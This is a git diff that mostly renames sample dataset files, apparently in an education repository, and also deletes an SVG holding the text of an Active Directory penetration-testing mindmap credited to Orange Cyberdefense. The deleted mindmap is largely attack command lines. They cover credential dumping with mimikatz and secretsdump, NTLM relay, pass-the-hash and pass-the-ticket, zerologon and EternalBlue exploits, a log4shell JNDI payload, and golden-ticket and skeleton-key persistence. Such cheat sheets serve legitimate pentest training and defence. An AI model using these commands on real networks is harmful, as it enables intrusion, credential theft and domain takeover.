dataset_pip_dataset.csv diff --git a/Documents/Sample_Datasets/Gun Violence Archive - Incidents/export-1cce6b6e-6c6b-4ff2-8a76-174e0ac22f7e.csv b/EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/export-1cce6b6e-6c6b-4ff2-8a76-174e0ac22f7e.csv similarity index 100% rename from Documents/Sample_Datasets/Gun Violence Archive - Incidents/export-1cce6b6e-6c6b-4ff2-8a76-174e0ac22f7e.csv rename to EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/export-1cce6b6e-6c6b-4ff2-8a76-174e0ac22f7e.csv diff --git a/Documents/Sample_Datasets/Gun Violence Archive - Incidents/export-626c6836-95f2-4f8f-9b7a-d7fb46844e98.csv b/EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/export-626c6836-95f2-4f8f-9b7a-d7fb46844e98.csv similarity index 100% rename from Documents/Sample_Datasets/Gun Violence Archive - Incidents/export-626c6836-95f2-4f8f-9b7a-d7fb46844e98.csv rename to EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/export-626c6836-95f2-4f8f-9b7a-d7fb46844e98.csv diff --git a/Documents/Sample_Datasets/Gun Violence Archive - Incidents/export-82dc1cbe-49a7-4a2c-a57e-4f53db8a9b3c.csv b/EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/export-82dc1cbe-49a7-4a2c-a57e-4f53db8a9b3c.csv similarity index 100% rename from Documents/Sample_Datasets/Gun Violence Archive - Incidents/export-82dc1cbe-49a7-4a2c-a57e-4f53db8a9b3c.csv rename to EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/export-82dc1cbe-49a7-4a2c-a57e-4f53db8a9b3c.csv diff --git a/Documents/Sample_Datasets/Gun Violence Archive - Incidents/export-8d88e7cd-4fe6-4667-9a0b-7fe114ab19de.csv b/EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/export-8d88e7cd-4fe6-4667-9a0b-7fe114ab19de.csv similarity index 100% rename from Documents/Sample_Datasets/Gun Violence Archive - Incidents/export-8d88e7cd-4fe6-4667-9a0b-7fe114ab19de.csv rename to EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/export-8d88e7cd-4fe6-4667-9a0b-7fe114ab19de.csv diff --git a/Documents/Sample_Datasets/Gun Violence Archive - Incidents/export-8f02fa05-e1d5-4eb2-8656-b13671c34047.csv b/EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/export-8f02fa05-e1d5-4eb2-8656-b13671c34047.csv similarity index 100% rename from Documents/Sample_Datasets/Gun Violence Archive - Incidents/export-8f02fa05-e1d5-4eb2-8656-b13671c34047.csv rename to EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/export-8f02fa05-e1d5-4eb2-8656-b13671c34047.csv diff --git a/Documents/Sample_Datasets/Gun Violence Archive - Incidents/export-b27072c5-0faa-43cc-8fbb-71af94f24b0d.csv b/EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/export-b27072c5-0faa-43cc-8fbb-71af94f24b0d.csv similarity index 100% rename from Documents/Sample_Datasets/Gun Violence Archive - Incidents/export-b27072c5-0faa-43cc-8fbb-71af94f24b0d.csv rename to EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/export-b27072c5-0faa-43cc-8fbb-71af94f24b0d.csv diff --git a/Documents/Sample_Datasets/Gun Violence Archive - Incidents/massshootings20-20-2023.csv b/EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/massshootings20-20-2023.csv similarity index 100% rename from Documents/Sample_Datasets/Gun Violence Archive - Incidents/massshootings20-20-2023.csv rename to EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/massshootings20-20-2023.csv diff --git a/Documents/Sample_Datasets/Gun Violence Archive - Incidents/officer involved.csv b/EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/officer involved.csv similarity index 100% rename from Documents/Sample_Datasets/Gun Violence Archive - Incidents/officer involved.csv rename to EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/officer involved.csv diff --git a/Documents/Sample_Datasets/Screen Time Data.csv b/EduDocuments/Sample_Datasets/Screen Time Data.csv similarity index 100% rename from Documents/Sample_Datasets/Screen Time Data.csv rename to EduDocuments/Sample_Datasets/Screen Time Data.csv diff --git a/Documents/Sample_Datasets/Wellbeing_and_lifestyle_data_Kaggle.csv b/EduDocuments/Sample_Datasets/Wellbeing_and_lifestyle_data_Kaggle.csv similarity index 100% rename from Documents/Sample_Datasets/Wellbeing_and_lifestyle_data_Kaggle.csv rename to EduDocuments/Sample_Datasets/Wellbeing_and_lifestyle_data_Kaggle.csv diff --git a/Documents/Sample_Datasets/conservative_news_domains.txt b/EduDocuments/Sample_Datasets/conservative_news_domains.txt similarity index 100% rename from Documents/Sample_Datasets/conservative_news_domains.txt rename to EduDocuments/Sample_Datasets/conservative_news_domains.txt diff --git a/Documents/Sample_Datasets/forbes_richman_Annual_03-30-23.csv b/EduDocuments/Sample_Datasets/forbes_richman_Annual_03-30-23.csv similarity index 100% rename from Documents/Sample_Datasets/forbes_richman_Annual_03-30-23.csv rename to EduDocuments/Sample_Datasets/forbes_richman_Annual_03-30-23.csv diff --git a/Documents/Sample_Datasets/global-data-on-sustainable-energy (1).csv b/EduDocuments/Sample_Datasets/global-data-on-sustainable-energy (1).csv similarity index 100% rename from Documents/Sample_Datasets/global-data-on-sustainable-energy (1).csv rename to EduDocuments/Sample_Datasets/global-data-on-sustainable-energy (1).csv diff --git a/Documents/Sample_Datasets/preprocessed_world_data_2023.csv b/EduDocuments/Sample_Datasets/preprocessed_world_data_2023.csv similarity index 100% rename from Documents/Sample_Datasets/preprocessed_world_data_2023.csv rename to EduDocuments/Sample_Datasets/preprocessed_world_data_2023.csv diff --git a/Documents/Sample_Datasets/world-data-2023.csv b/EduDocuments/Sample_Datasets/world-data-2023.csv similarity index 100% rename from Documents/Sample_Datasets/world-data-2023.csv rename to EduDocuments/Sample_Datasets/world-data-2023.csv diff --git a/References/orange-cyberdefense_pentest_ad_dark_2023_02.svg b/References/orange-cyberdefense_pentest_ad_dark_2023_02.svg deleted file mode 100644 index ab1e01f..0000000 --- a/References/orange-cyberdefense_pentest_ad_dark_2023_02.svg +++ /dev/null @@ -1,433 +0,0 @@ -]>‎no credentials‎Is enterprise admin ?‎Permissions move‎Domain admin‎got administrator access on one machine‎Lateral Move‎got username but no password‎classic quick compromission methods‎how to read‎MITM (Listen and relay)‎Listener‎NTLM Relay‎Arp poisoning‎Persistence‎Trust relationship / Forest to Forest‎Privilege escalation‎Known vulnerabilities‎Weak ADCS configuration‎Kerberos Delegation move‎valid credentials‎cracking hash‎Pentesting active ‎directory‎Scan Network‎cme smb <ip_range> # enumerate smb hosts‎nmap -sP -p <ip> # ping scan‎nmap -PN -sV --top-ports 50 --open <ip> # ‎quick scan‎nmap -PN --script smb-vuln* -p139,445 <ip> # ‎search smb vuln‎nmap -PN -sC -sV -oA <output> <ip> # classic ‎scan‎nmap -PN -sC -sV -p- -oA <output> <ip> # full ‎scan‎nmap -sU -sC -sV -oA <output> <ip> # udp scan‎find vulnerable host‎Find DC IP‎nmcli dev show eth0 # show domain name & dns‎nslookup -type=SRV _ldap._tcp.dc._msdcs.<‎domain>‎zone transfer‎dig axfr <domain_name> @<name_server>‎List guest access on smb share‎enum4linux -a -u "" -p "" <dc-ip> && ‎enum4linux -a -u "guest" -p "" <dc-ip>‎smbmap -u "" -p "" -P 445 -H <dc-ip> && ‎smbmap -u "guest" -p "" -P 445 -H <dc-ip>‎smbclient -U '%' -L //<dc-ip> && smbclient -U '‎guest%' -L //<dc-ip>‎cme smb <ip> -u '' -p '' # enumerate null session‎cme smb <ip> -u 'a' -p '' # enumerate anonymous ‎access‎Enumerate ldap‎nmap -n -sV --script "ldap* and not brute" -p ‎389 <dc-ip>‎ldapsearch -x -h <ip> -s base ‎user found‎Find user list‎enum4linux -U <dc-ip> | grep 'user:'‎cme smb <ip> --users ‎net rpc group members 'Domain Users' -W '<‎domain>' -I '<ip>' -U '%'‎OSINT - enumerate username on internet‎nmap -p 88 --script=krb5-enum-users --script-‎args="krb5-enum-users.realm='<domain>',‎userdb=<users_list_file>" <ip> ‎user found‎poisoning‎🔥 LLMNR / NBTNS/ MDNS‎responder -I eth0 (use --lm to force lm ‎downgrade) # disable smb & http if relay‎IPV6 prefered to IPV4‎mitm6 -d <domain>‎ARP poisoning‎bettercap‎Poisoning SMB ->‎ HTTP ->‎coerce‎Unauthent PetitPotam (CVE-2022-26925)‎PetitPotam.py -d <domain> <listener_ip> <‎target_ip>‎coerce SMB ->‎Enterprise Admin‎GG good luck for the report !‎ACLs/ACEs‎permissions‎🔥 dcsync‎#Administrators, Domain Admins, or Enterprise ‎Admins as well as Domain Controller computer ‎accounts‎mimikatz lsadump::dcsync /domain:<target_‎domain> /user:<target_domain>\administrator‎secretsdump '<domain>'/'<user>':'<‎password>'@'<domain_controller>'‎can change‎msDS-KeyCredentialLInk‎(Generic Write) + ADCS‎Shadow Credentials‎(need ADCS)‎Whisker.exe‎certipy shadow auto '-u <user>@<domain>' -p <‎password> -account '<target_account>'‎pywhisker.py‎pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "‎CERTIFICATE_PASSWORD" --target "TARGET_‎SAMNAME" --action "list"‎Pass the Certificate‎On Group‎Self (Self-Membership) on Group‎GenericAll/WriteProperty on Group‎WriteProperty (Self-Membership)‎WriteOwner on Group‎WriteDACL + WriteOwner‎Give yourself Generic all‎owneredit.py ‎dacledit.py‎Add group member‎net group "<group>" <myuser> /add /domain‎ldeep ldap -u <user> -p <pwd> -d <domain> -s ‎ldap://<dc> add_to_group "CN=<user>,DC=<‎domain>" "CN=<group>,DC=<domain>"‎ACL‎On Computer‎GenericAll / GenericWrite‎msDs-AllowedToActOnBehalf‎add Key Credentials‎shadow credentials‎RBCD‎On User‎GenericAll / GenericWrite‎change password‎net user <user> <password> /domain‎add SPN (target Kerberoasting)‎targetedKerberoast.py -d <domain> -u <user> -‎p <pass>‎hash found (TGS)‎add Key Credentials‎logon script‎User with clear text pass‎Access‎shadow credentials‎ForceChangePassword‎net user <user> <password> /domain‎net rpc password <user> <password> -S <dc_‎fqdn>‎User with clear text pass‎aclpwn.py‎acltoolkit <domain>/<user>:'<password>@<‎target> get-objectacl [-all| -object <object>]‎get laps passwords‎who can read LAPS‎MATCH p=(g:Group)-[:ReadLAPSPassword]->(c:‎Computer) RETURN p‎Get-LAPSPasswords -DomainController <ip_‎dc> -Credential <domain>\<login> | Format-‎Table -AutoSize‎foreach ($objResult in $colResults){$‎objComputer = $objResult.Properties; $‎objComputer.name|where {$objcomputer.name -‎ne $env:computername}|%{foreach-object {Get-‎AdmPwdPassword -ComputerName $_}}}‎cme ldap <dc_ip> -d <domain> -u <user> -p <‎password> --module laps‎use post/windows/gather/credentials/enum_laps‎admin‎ GPO‎MATCH (gr:Group), (gp:GPO), p=((gr)-[:‎GenericWrite]->(gp)) RETURN p‎SID of principals that can create new GPOs in the ‎domain‎Get-DomainObjectAcl -SearchBase "CN=Policies,‎CN=System,DC=blah,DC=com" -‎ResolveGUIDs | ? {​​​​​​​ $_.ObjectAceType -eq "‎Group-Policy-Container" }​​​​​​​ | select ObjectDN, ‎ActiveDirectoryRights, SecurityIdentifier | fl‎return the principals that can write to the GP-Link ‎attribute on OUs‎Get-DomainOU | Get-DomainObjectAcl -‎ResolveGUIDs | ? {​​​​​​​​​​​​​ $_.ObjectAceType -eq "GP-‎Link" -and $_.ActiveDirectoryRights -match "‎WriteProperty" }​​​​​​​​​​​​​ | select ObjectDN, ‎SecurityIdentifier | fl‎Generic Write on GPO‎Abuse GPO‎Access‎DNSadmins abuse‎(CVE-2021-40469)‎dnscmd.exe /config /serverlevelplugindll <\\‎path\to\dll> # need a dnsadmin user‎sc \\DNSServer stop dns‎sc \\DNSServer start dns‎Admin‎Domain Admin‎Lateral move‎Crack Hash‎Kindly provided by Orange Cyberdefense ;-)‎Some commands can break stuff, be sure to ‎know what are you doing !‎Please find legend below.‎Domain admin‎🔥dump ntds.dit‎cme smb <dcip> -u <user> -p <password> -d <‎domain> --ntds‎secretsdump.py '<domain>/<user>:<pass>'@<ip>‎ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q‎secretsdump.py -ntds ntds_file.dit -system ‎SYSTEM_FILE -hashes lmhash:nthash LOCAL -‎outputfile ntlm-extract‎windows/gather/credentials/domain_hashdump‎certsync -u <user> -p <password> -d <domain> -‎dc-ip <dcip> -ns <nsip>‎Lateral move‎Crack Hash‎dpapi.py backupkeys -hashes ':<hash>' -t ‎Administrator@<dc_ip> --export ‎# note : dpapi.py != DonPAPI‎DonPAPI -pvk <domain_backupkey.pvk> - H ':<‎hash>' <domain>/<user>@<ip_range>‎Credentials‎Administrator access‎Extract credentials‎from LSASS‎LSASS as a Protected Process‎PPLdump64.exe <lsass.exe|lsass_pid> lsass.dmp‎mimikatz "!+" "!processprotect /process:lsass.‎exe /remove" "privilege::debug" "token::‎elevate" "sekurlsa::logonpasswords" "!‎processprotect /process:lsass.exe" "!-" #with ‎mimidriver.sys ‎procdump.exe -accepteula -ma lsass.exe lsass.‎dmp‎mimikatz "privilege::debug" "sekurlsa::minidump ‎lsass.dmp" "sekurlsa::logonPasswords" "exit"‎mimikatz "privilege::debug" "token::elevate" "‎sekurlsa::logonpasswords" "exit"‎load kiwi‎creds_all‎cme smb <ip_range> -u <user> -p <password> -‎M lsassy‎🔥lsassy -d <domain> -u <user> -p <‎password> <ip>‎User + Pass‎Hashes NTLM‎Lateral move (PTH/PTK)‎(clear text pass in some case)‎Extract credentials‎from SAM‎cme smb <ip_range> -u <user> -p '<password>' --‎sam ‎hashdump‎reg save HKLM\SAM <file>; reg save HKLM\‎SECURITY <file>; reg save HKLM\SYSTEM <file>‎secretsdump.py -system SYSTEM -sam SAM ‎LOCAL‎shadow copies‎diskshadow list shadows all‎mklink /d c:\shadowcopy \\?\GLOBALROOT\‎Device\HarddiskVolumeShadowCopy1\‎mimikatz "privilege::debug" "lsadump::sam" "‎exit"‎🔥secretsdump.py <domain>/<user>:<‎password>@<ip>‎reg.py <domain>/<user>:<password>@<ip> ‎backup -o '\\<smb_ip>\share'‎secretsdump.py -sam <sam_file> -system <‎system_file> LOCAL‎Hashes NTLM‎Lateral move PTH‎Extract credentials from LSA‎cme smb <ip_range> -u <user> -p '<password>' --‎lsa‎🔥secretsdump.py <domain>/<user>:<‎password>@<ip>‎reg.py <domain>/<user>:<password>@<ip> ‎backup -o '\\<smb_ip>\share'‎secretsdump.py -security <security_file> -‎system <system_file> LOCAL‎Cached domain logon‎Machine account‎Service account‎MsCache 2‎User + Pass‎dpapi extract‎🔥DonPAPI.py <domain>/<user>:<‎password>@<target>‎mimikatz.exe "sekurlsa::dpapi"‎secretsdump.py <domain>/<user>:<passwor>@<‎ip>‎search password files‎findstr /si 'password' *.txt *.xml *.docx‎search stored password ‎lazagne.exe all‎chrome‎%appdata%\Local\Google\Chrome\User Data\‎Default‎SharpChromium.exe‎token manipulation‎.\incognito.exe list_tokens -u‎.\incognito.exe execute -c "<domain>\<user>" ‎powershell.exe‎use incognito‎impersonate_token <domain>\\<user>‎cme smb <ip> -u <user> -p <password> -M ‎impersonate ‎irs.exe list‎irs.exe exec --pid <pid> --command <command>‎Extract credentials with certificate ‎authentication (ADCS required)‎masky - d <domain> -u <user> (-p <password> ||‎ -k || -H <hash>) -ca <certificate authority> <ip>‎NT hash‎Lateral move PTH‎ccache‎Lateral move Pass the ticket‎pfx‎Lateral move Pass the certificate‎ACL‎User + Pass‎Impersonate RDP Session‎psexec -s -i cmd‎query user‎cmd /k tscon <id> /dest:console‎Lateral move RDP‎Hydrid-Environement (Azure AD Connect)‎Dump cleartext password of MSOL Account on ‎AAD Connect server‎azuread_decrypt_msol_v2.ps1‎cme smb <ip> -u <user> -p <password> -M msol‎DCSync‎User + Pass‎Lateral move (Clear text pass)‎Lateral move‎WSUSpect‎WSUSpendu.ps1 # need compromised WSUS ‎server‎sccm admin‎abuse sccm‎CMPivot‎PowerSCCM‎SharpSCCM‎Administrator access‎MSSQL‎find mssql access‎cme mssql <ip> -u <user> -p <password> -d <‎domain>‎Users with SQLadmin‎MATCH p=(u:User)-[:SQLAdmin]->(c:Computer) ‎RETURN p‎EXECUTE sp_configure 'show advanced options', ‎1; RECONFIGURE;‎EXECUTE sp_configure 'xp_cmdshell', 1; ‎RECONFIGURE;‎EXEC xp_cmdshell '<cmd>'‎Low Access‎trust link‎Get-SQLServerLinkCrawl -username <user> -‎password <pass> -Verbose -Instance <sql_‎instance> -Query "<query>"‎use exploit/windows/mssql/mssql_linkcrawler‎MSSQL‎mssqlclient.py -windows-auth <domain>/<‎user>:<password>@<ip> (pr #1397)‎enum_db‎enable_xp_cmdshell‎xp_cmdshell <cmd>‎Low Access‎enum_impersonate‎exec_as_user <user>‎exec_as_login <login>‎MSSQL‎xp_dir_tree <ip>‎trustlink‎sp_linkedservers‎use_link‎MSSQL‎coerce SMB ->‎Local User‎cme smb -u <user> -p <pass>' <ip> --local-auth‎impacket like cleartext pasword without domain/‎Administrator access‎Password‎Cleartext password‎interactive-shell‎psexec.py <domain>/<user>:<password>@<ip>‎psexec.exe -AcceptEULA \\<ip>‎mimikatz "privilege::debug sekurlsa::pth /user:<‎user> /domain:<domain> /ntlm:<hash>"‎Authority/sytem‎pseudo-shell (file write and read)‎atexec.py <domain>/<user>:<password>@<ip> "‎command"‎smbexec.py <domain>/<user>:<password>@<‎ip>‎wmiexec.py <domain>/<user>:<password>@<‎ip>‎dcomexec.py <domain>/<user>:<password>@<‎ip>‎crackmapexec smb <ip_range> -u <user> -p <‎password> -d <domain>‎crackmapexec smb <ip_range> -u <user> -p <‎password> -local-auth‎Authority/sytem‎WinRM‎evil-winrm -i <ip> -u <user> -p <password>‎RDP‎xfreerdp /u:<user> /d:<domain> /p:<password> /‎v:<ip>‎SMB‎smbclient.py <domain>/<user>:<password>@<‎ip>‎search files‎MSSQL‎crackmapexec mssql <ip_range> -u <user> -p <‎password>‎mssqlclient.py -windows-auth <domain>/<‎user>:<password>@<ip>‎MSSQL‎Administrator access‎Low access‎High access‎NTLM Hash‎🔥 Pass the hash (PTH)‎interactive-shell‎psexec.py -hashes ":<hash>" <user>@<ip>‎psexec.exe -AcceptEULA \\<ip>‎mimikatz "privilege::debug sekurlsa::pth /user:<‎user> /domain:<domain> /ntlm:<hash>"‎Authority/sytem‎pseudo-shell (file write and read)‎atexec.py -hashes ":<hash>" <user>@<ip> "‎command"‎smbexec.py -hashes ":<hash>" <user>@<ip>‎wmiexec.py -hashes ":<hash>" <user>@<ip>‎dcomexec.py -hashes ":<hash>" <user>@<ip>‎crackmapexec smb <ip_range> -u <user> -d <‎domain> -H ':<hash>'‎crackmapexec smb <ip_range> -u <user> -H ':<‎hash>' --local-auth‎Authority/sytem‎WinRM‎evil-winrm -i <ip> -u <user> -H <hash>‎RDP‎reg.py <domain>/<user>@<ip> -hashes ':<hash>' ‎add -keyName 'HKLM\System\‎CurrentControlSet\Control\Lsa' -v '‎DisableRestrictedAdmin' -vt 'REG_DWORD' -vd '0'‎xfreerdp /u:<user> /d:<domain> /pth:<hash> /‎v:<ip>‎SMB‎smbclient.py -hashes ":<hash>" <user>@<ip>‎search files‎MSSQL‎crackmapexec mssql <ip_range> -H ':<hash>'‎mssqlclient.py -windows-auth -hashes ":<‎hash>" <domain>/<user>@<ip> ‎MSSQL‎Administrator access‎Low access‎High access‎overpass the hash / pass the key (PTK)‎Rubeus asktgt /user:victim /rc4:<rc4value>‎Rubeus ptt /ticket:<ticket>‎Rubeus createnetonly /program:C:\Windows\‎System32\[cmd.exe||upnpcont.exe]‎Rubeus ptt /luid:0xdeadbeef /ticket:<ticket>‎getTGT.py <domain>/<user> -hashes :<hashes>‎getTGT.py -aesKey '<key>' <domain>/<user>@<‎ip>‎Pass the ticket‎Kerberos‎Pass the ticket‎(ccache / kirbi)‎Convert format‎ticketConverter.py <kirbi||ccache> <ccache||‎kirbi>‎export KRB5CCNAME=/root/impacket-‎examples/domain_ticket.ccache‎impacket tools: Same as Pass the hash but use : -‎k and -no-pass for impacket‎mimikatz kerberos::ptc "<ticket>"‎Rubeus.exe ptt /ticket:<ticket>‎proxychains secretsdump -k'<domain>'/'<‎user>'@'<ip>'‎modify SPN‎tgssub.py -in <ticket.ccache> -out <newticket.‎ccache> -altservice "<service>/<target>" #pr ‎1256‎Pass the Ticket‎Administrator access‎see dcsync‎aesKey‎impacket tools: Same as Pass the hash but use : -‎aesKey for impacket (and use FQDN)‎proxychains secretsdump -aesKey <key> '<‎domain>'/'<user>'@'<ip>'‎see dcsync‎Administrator access‎Socks (with NTLM relay)‎proxychains lookupsid.py <domain>/<user>@<‎ip> -no-pass -domain-sids‎proxychains mssqlclient.py -windows-auth <‎domain>/<user>@<ip> -no-pass‎proxychains secretsdump -no-pass '<domain>'/'<‎user>'@'<ip>'‎pseudo-shell (file write and read)‎proxychains atexec.py -no-pass <domain>/<‎user>@<ip> "command"‎proxychains smbexec.py -no-pass <domain>/<‎user>@<ip>‎Authority/sytem‎proxychains smbclient.py -no-pass <user>@<ip>‎search files‎Users‎MSSQL‎see dcsync‎Administrator access‎Certificate (pfx)‎get hash NTLM from certificate‎certipy auth -pfx <crt_file> -dc-ip <dc_ip>‎NTLM hash‎Pass the Certificate‎pkinit‎ gettgtpkinit.py -cert-pfx "<pfx_file>" ^[-pfx-‎pass "<cert-password>"] "<fqdn_domain>/<‎user>" "<tgt_ccache_file>"‎Rubeus.exe asktgt /user:"<username>" /‎certificate:"<pfx_file>" [/password:"<certificate_‎password>"] /domain:"<fqdn-domain>" /dc:"<‎dc>" /show‎certipy auth -pfx <crt_file> -dc-ip <dc_ip>‎Schannel‎certipy auth -pfx <crt_file> -ldap-shell‎add_computer‎set_rbcd‎RBCD‎Pass the ticket‎Got valid username‎🔥Password spray‎Get password policy (need creds, but you should ‎get the policy before starting a spray)‎cme <IP> -u 'user' -p 'password' --pass-pol‎enum4linx -u 'username' -p 'password' -P <IP>‎Get-ADDefaultDomainPasswordPolicy‎FGPP‎ Get-ADFineGrainedPasswordPolicy -filter *‎Get-ADUserResultantPasswordPolicy -Identity <‎user>‎ldapsearch-ad.py --server '<dc>' -d <domain> -‎u <user> -p <pass> --type pass-pols‎cme smb <dc-ip> -u user.txt -p password.txt --‎no-bruteforce # test user=password‎cme smb <dc-ip> -u user.txt -p password.txt # ‎multiple test (carrefull of lock policy)‎sprayhound -U <users.txt> -d <domain> -dc <‎dcip>‎Clear text credentials found‎ASREPRoast‎Get ASREPRoastable users (need creds)‎Get-DomainUser -PreauthNotRequired -‎Properties SamAccountName‎MATCH (u:User {dontreqpreauth:true}), (c:‎Computer), p=shortestPath((u)-[*1..]->(c)) ‎RETURN p‎Get hash‎python GetNPUsers.py <domain>/ -usersfile <‎usernames.txt> -format hashcat -outputfile <‎hashes.domain.txt>‎Rubeus.exe asreproast /format:hashcat‎Blind Kerberoasting‎Rubeus.exe keberoast /domain:<domain> /dc:<‎dcip> /nopreauth: <asrep_user> /spns:<users.‎txt>‎GetUserSPNs.py -no-preauth "<asrep_user>" -‎usersfile "<user_list.txt>" -dc-host "<dc_ip>" "<‎domain>"/‎Hash found (TGS)‎CVE-2022-33679‎python3 CVE-2022-33679.py <domain>/<‎user> <target>‎Hash found (ASREP)‎Lateral move (PTT)‎Low hanging fruit‎zerologon (unsafe)‎(CVE-2020-1472)‎zerologon-scan '<dc_netbios_name>' '<ip>'‎python3 cve-2020-1472-exploit.py <MACHINE_‎BIOS_NAME> <ip>‎secretsdump.py <DOMAIN>/<MACHINE_BIOS_‎NAME>\$@<IP> -no-pass -just-dc-user "‎Administrator" ‎secretsdump.py -hashes :<HASH_admin> <‎DOMAIN>/Administrator@<IP>‎python3 restorepassword.py -target-ip <IP> <‎DOMAIN>/<MACHINE_BIOS_NAME>@<MACHINE_‎BIOS_NAME> -hexpass <HEXPASS>‎Eternal Blue‎MS17-010‎exploit/windows/smb/ms17_010_eternalblue‎SYSVOL & GPP‎MS14-025‎use scanner/smb/smb_enum_gpp‎findstr /S /I cpassword \\<FQDN>\sysvol\<‎FQDN>\policies\*.xml‎tomcat/jboss manager‎auxiliary/scanner/http/tomcat_enum‎exploit/multi/http/tomcat_mgr_deploy‎java rmi‎exploit/multi/misc/java_rmi_server‎java serialized port‎ysoserial‎vulnerable product with cve‎searchsploit‎proxylogon‎proxyshell‎log4shell‎${jndi:ldap://<ip>:<port>/o=reference}‎rogueJndi-1.0.jar‎database credentials‎use admin/mssql/mssql_enum_sql_logins‎...‎Admin‎Domain Admin‎MSSQL connection‎Admin‎Domain Admin‎Low Access‎Credits‎mayfly (@M4yFly) ‎viking (@Vikingfr)‎Sant0rryu (@Sant0rryu)‎Jenaye (@jenaye_fr)‎Daahtk (@Daahtk)‎Entry point‎Highlight Technique 1‎technique/status/explanation‎Enumeration infos‎linux command‎windows command‎result / go to‎Technique 2 (CVE)‎technique/status/explanation‎windows command‎linux command‎or‎Result / go to 1‎Result / go to 2‎Technique3‎technique/status/explanation‎technique/status/explanation‎assemble‎windows command‎linux command‎go to‎Legend‎Bloodhound‎PowerView ‎Impacket‎crackmapexec‎certipy‎Metsaploit‎Windows tool‎Command‎dangerous (could break stuff)‎🔥 very common and efficient technic (quick ‎win)‎CVE (probably patched)‎inspired by / Sources‎https://www.thehacker.recipes/ (@_nwodtuhs)‎https://www.ired.team/ (@spotheplanet)‎https://ppn.snovvcrash.rocks/ (@snovvcrash)‎https://book.hacktricks.xyz/ (@carlospolopm)‎https://github.com/swisskyrepo/‎PayloadsAllTheThings/ (@pentest_swissky)‎https://blog.harmj0y.net/ (@harmj0y)‎https://hausec.com/domain-penetration-‎testing/ (@haus3c)‎https://dirkjanm.io/ (@_dirkjan)‎https://casvancooten.com/ (@chvancooten)‎https://zer1t0.gitlab.io/posts/attacking_ad/‎https://beta.hackndo.com (@HackAndDo)‎and a lot more ...‎(MITM)‎Listen and Relay‎Listen‎🔥 responder -I eth0 (use --lm to force lm ‎downgrade)‎smbclient.py‎NetNtlmv1‎NetNtlmv2‎User‎NTLM relay‎relay on itself‎MS08-068‎use exploit/windows/smb/smb_relay #‎windows200 / windows server2008‎Admin‎SMB -> LDAP(S)‎NetNTLMv1‎remove mic‎NetNTLMv2‎remove mic (CVE-2019-1040)‎relay to LDAP‎ntlmrelayx.py --remove-mic --escalate-user <‎user> -t ldap://<dc_fqdn> -smb2support‎ntlmrelayx.py -t ldaps://<dc> --remove-mic --‎add-computer <computer_name> <computer_‎password> --delegate-access -smb2support‎ntlmrelayx -t ldap://<dc> --shadow-‎credentials --shadow-target '<dc>'‎ntlmrelayx.py -wh <attacker_ip> -t ldap://<‎target> -l /tmp -6 -debug‎RBCD‎DcSync‎shadow credentials‎Users‎HTTP(S) -> LDAP‎-> SMB‎SMB unsigned‎Find SMB not signed (default on non DC)‎nmap -Pn -sS -T4 --open --script smb-security-‎mode -p445 ADDRESS/MASK‎use exploit/windows/smb/smb_relay‎cme smb $hosts --gen-relay-list relay.txt‎ntlmrelayx.py -tf targets.txt -smb2support (-‎6) --enum-domain‎🔥ntlmrelayx.py -tf targets.txt -‎smb2support -socks (-6)‎lateral move (socks)‎Users‎-> HTTP‎http ADCS web‎sccm ntlm relay attack‎ESC8‎-> MSSQL‎relay to mssql‎ntlmrelayx.py -t mssql://<ip> -smb2support ‎–socks‎lateral move (socks)‎SMB -> Netlogon‎Zero-Logon (safe method)‎(CVE-2020-1472)‎coerce come from dc01, relay to dc02‎ntlmrelayx.py -t dcsync://<dc_02_ip> -‎smb2support -auth-smb <user>:<password>‎DcSync‎wsus relay‎pywsus.py‎Persistence‎net group "domain admins" myuser /add /domain‎Golden ticket‎ticketer.py -aesKey <aeskey> -domain-sid <‎domain_sid> -domain <domain> <anyuser> ‎mimikatz "kerberos::golden /user:<admin_user> /‎domain:<domain> /sid:<domain-sid>/aes256:<‎krbtgt_aes256> /ptt"‎Silver Ticket‎mimikatz "kerberos::golden /sid:<current_user_‎sid> /domain:<domain-sid> /target:<target_‎server> /service:<target_service> /aes256:<‎computer_aes256_key> /user:<any_user> /ptt"‎ticketer.py -nthash <machine_nt_hash> -domain-‎sid <domain_sid> -domain <domain> <anyuser>‎Diamond ticket‎Saphire Ticket‎Directory Service Restore Mode (DSRM)‎PowerShell New-ItemProperty “HKLM:\System\‎CurrentControlSet\Control\Lsa\” -Name ‎“DsrmAdminLogonBehavior” -Value 2 -‎PropertyType DWORD‎Skeleton Key‎mimikatz "privilege::debug" "misc::skeleton" "‎exit"‎password is mimikatz‎Custom SSP‎mimikatz "privilege::debug" "misc::memssp" "‎exit"‎C:\Windows\System32\kiwissp.log‎Golden certificate‎certipy ca -backup -ca '<ca_name>' -username <‎user>@<domain> -hashes <hash>‎certipy forge -ca-pfx <ca_private_key> -upn <‎user>@<domain> -subject 'CN=<user>,CN=‎Users,DC=<CORP>,DC=<LOCAL>‎DC shadow‎Acl manipulation‎...‎Trust relationship‎Enumeration‎nltest.exe /trusted_domains‎([System.DirectoryServices.ActiveDirectory.‎Domain]::GetCurrentDomain()).GetAllTrustRel‎ationships()‎Get-DomainTrust -Domain <domain>‎Get-DomainTrustMapping‎ldeep ldap -u <user> -p '<password>' -d <‎domain> -s ldap://<dc_ip> trusts‎Child Domain to Forest Compromise - extra SIDs‎(parent/child) (child/parent)‎Golden ticket‎Get-DomainSID -Domain <domain>‎Get-DomainSID -Domain <target_domain>‎mimikatz lsadump::dcsync /domain:<domain> /‎user:<domain>\krbtgt‎mimikatz kerberos::golden /user:Administrator /‎krbtgt:<HASH_KRBTGT> /domain:<domain> /‎sid:<user_sid> /sids:<RootDomainSID-519> 